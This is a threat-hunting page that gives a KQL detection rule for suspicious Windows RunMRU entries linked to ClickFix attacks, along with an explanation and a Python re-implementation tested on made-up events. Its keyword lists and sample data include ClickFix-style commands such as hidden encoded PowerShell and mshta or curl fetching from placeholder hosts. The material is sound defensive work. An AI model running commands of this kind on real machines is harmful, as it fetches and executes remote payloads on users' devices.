
# Suspicious RUNMRU Entry

## Query Information

#### Description
This query should be implemented as a custom detection; it triggers when a suspicious Windows RunMRU entry is written on a device. RunMRU entries (the Run dialog history kept under `HKCU\...\CurrentVersion\Explorer\RunMRU`) are one of the key indicators for ClickFix, where a user is tricked into pasting a command into the Run dialog.

The lists of *Parameters* and *Executables* are deliberately limited; add entries according to your risk appetite. Note that both conditions must hold: the value data must contain at least one parameter and at least one executable.

#### Risk
There is a high likelihood that the command found is deploying malicious content on the device.

#### References
- https://detect.fyi/hunting-clickfix-initial-access-techniques-8c1b38d5ef9b
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-march-2025/

## Defender XDR
```KQL
// Flags and executables commonly seen in ClickFix commands pasted into the Run dialog
let Parameters = dynamic(["http", "https", "Encoded", "EncodedCommand", "-e", "-eC", "-enc", "-w"]);
let Executables = dynamic(["cmd", "powershell", "curl", "mshta"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
// HKCU\...\CurrentVersion\Explorer\RunMRU holds the Run dialog history
| where RegistryKey has "RunMRU"
// Require at least one parameter AND at least one executable in the value data
| where RegistryValueData has_any (Parameters) and RegistryValueData has_any (Executables)
| project-reorder Timestamp, DeviceId, DeviceName, RegistryValueData, RegistryKey
```

## Sentinel
```KQL
// Flags and executables commonly seen in ClickFix commands pasted into the Run dialog
let Parameters = dynamic(["http", "https", "Encoded", "EncodedCommand", "-e", "-eC", "-enc", "-w"]);
let Executables = dynamic(["cmd", "powershell", "curl", "mshta"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
// HKCU\...\CurrentVersion\Explorer\RunMRU holds the Run dialog history
| where RegistryKey has "RunMRU"
// Require at least one parameter AND at least one executable in the value data
| where RegistryValueData has_any (Parameters) and RegistryValueData has_any (Executables)
| project-reorder TimeGenerated, DeviceId, DeviceName, RegistryValueData, RegistryKey
```

Explanation

This query is designed to detect potentially suspicious activity on a Windows device by examining the Windows registry for specific entries. It focuses on identifying entries in the "RunMRU" registry key, which records the commands that have been executed using the Run dialog box in Windows. The query looks for entries that contain certain parameters and executable names that are often associated with malicious activity.

Here's a simple breakdown of what the query does:

1. Parameters and Executables: It defines two lists:
   - Parameters: Includes terms like 'http', 'https', 'Encoded', 'EncodedCommand', and the short encoded-command and window-style flags ('-e', '-eC', '-enc', '-w').
   - Executables: Includes common command-line tools like "cmd", "powershell", "curl", and "mshta".
2. Registry Events: It filters events where a registry value has been set, specifically looking at the "RunMRU" key.
3. Suspicious Entries: It checks whether the registry value data contains at least one of the specified parameters and at least one of the specified executables; a value with only a URL, or only "powershell" without a flag, does not match. The `has_any` operator matches whole terms, not substrings, which is why both 'http' and 'https' are listed.
4. Output: The query then organizes the results to show the timestamp, device ID, device name, the data of the registry value, and the registry key itself.

This query is intended to be used as a custom detection rule to alert security teams when potentially malicious commands are executed on a device, helping to identify and mitigate threats early.
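The following is an added example, not code from the original page or from the author's repository: the detection logic above re-implemented in Python over a handful of constructed DeviceRegistryEvents-style records, so the matching can be studied offline without a tenant. KQL `has`/`has_any` match whole terms case-insensitively rather than substrings; the `has` function below approximates that by tokenising on non-alphanumeric characters. The SID, device name, URLs and value data in the sample events are all made up.

```python
"""Re-implementation of the Suspicious RUNMRU Entry query over constructed
sample events. Added example; it assumes a simplified model of KQL term
matching (lowercase alphanumeric runs) and does not talk to Defender/Sentinel.
"""
from __future__ import annotations

import re
from typing import Iterable

# Same lists as the KQL query on this page.
PARAMETERS = ["http", "https", "Encoded", "EncodedCommand", "-e", "-eC", "-enc", "-w"]
EXECUTABLES = ["cmd", "powershell", "curl", "mshta"]

_TERM = re.compile(r"[a-z0-9]+")


def terms(text: str) -> list[str]:
    """Approximate KQL term extraction: lowercase runs of alphanumerics.
    '-enc' becomes ['enc'], 'https://x' becomes ['https', 'x']."""
    return _TERM.findall(text.lower())


def has(value: str, needle: str) -> bool:
    """Approximate KQL `has`: the needle's terms occur as a contiguous run of
    whole terms in the value. So 'http' does NOT match 'https://...'."""
    n, v = terms(needle), terms(value)
    if not n:
        return False
    return any(v[i:i + len(n)] == n for i in range(len(v) - len(n) + 1))


def has_any(value: str, needles: Iterable[str]) -> bool:
    return any(has(value, n) for n in needles)


def is_suspicious_runmru(event: dict) -> bool:
    """Mirror of the query's three `where` stages."""
    if event.get("ActionType") != "RegistryValueSet":
        return False
    if not has(event.get("RegistryKey", ""), "RunMRU"):
        return False
    data = event.get("RegistryValueData", "")
    return has_any(data, PARAMETERS) and has_any(data, EXECUTABLES)


def detect(events: Iterable[dict]) -> list[dict]:
    """Return the matching events projected like the query's project-reorder."""
    keep = ("Timestamp", "DeviceId", "DeviceName", "RegistryValueData", "RegistryKey", "RegistryValueName")
    return [{k: e.get(k) for k in keep} for e in events if is_suspicious_runmru(e)]


# Constructed sample telemetry (not real data). Windows appends "\1" to each
# Run dialog history value, which is why the data below ends that way.
RUNMRU = (r"HKEY_CURRENT_USER\S-1-5-21-1111111111-2222222222-3333333333-1001"
          r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU")
RUNKEY = (r"HKEY_CURRENT_USER\S-1-5-21-1111111111-2222222222-3333333333-1001"
          r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")


def _ev(name: str, data: str, key: str = RUNMRU, action: str = "RegistryValueSet") -> dict:
    return {"Timestamp": "2025-04-23T09:00:00Z", "DeviceId": "dev-0001", "DeviceName": "ws01",
            "ActionType": action, "RegistryKey": key,
            "RegistryValueName": name, "RegistryValueData": data}


SAMPLE_EVENTS = [
    _ev("a", "notepad\\1"),                                   # benign, no hit
    _ev("b", "https://intranet.example.invalid\\1"),          # URL only, no executable
    _ev("c", "powershell -w hidden -enc ZQBjAGgAbwA=\\1"),    # ClickFix-style, hit
    _ev("d", "mshta https://example.invalid/verify.hta\\1"),  # mshta + URL, hit
    _ev("MRUList", "dcba"),                                   # ordering value, no hit
    _ev("Updater", "powershell -w hidden -File C:\\Users\\Public\\u.ps1", key=RUNKEY),  # wrong key
    _ev("e", "cmd /c curl http://example.invalid/x\\1", action="RegistryKeyCreated"),  # wrong action
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["DeviceName"], hit["RegistryValueName"], hit["RegistryValueData"])
```

Running the block prints the two hits (values `c` and `d`); the URL-only entry, the `MRUList` ordering value, the autorun `Run` key write and the non-`RegistryValueSet` action are all left alone, which is the behaviour the three `where` stages of the query give you.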

Details


Bert-Jan Pals

Released: April 23, 2025

Tables

DeviceRegistryEvents

Keywords

Device

Operators

let, dynamic, has, has_any, where, project-reorder
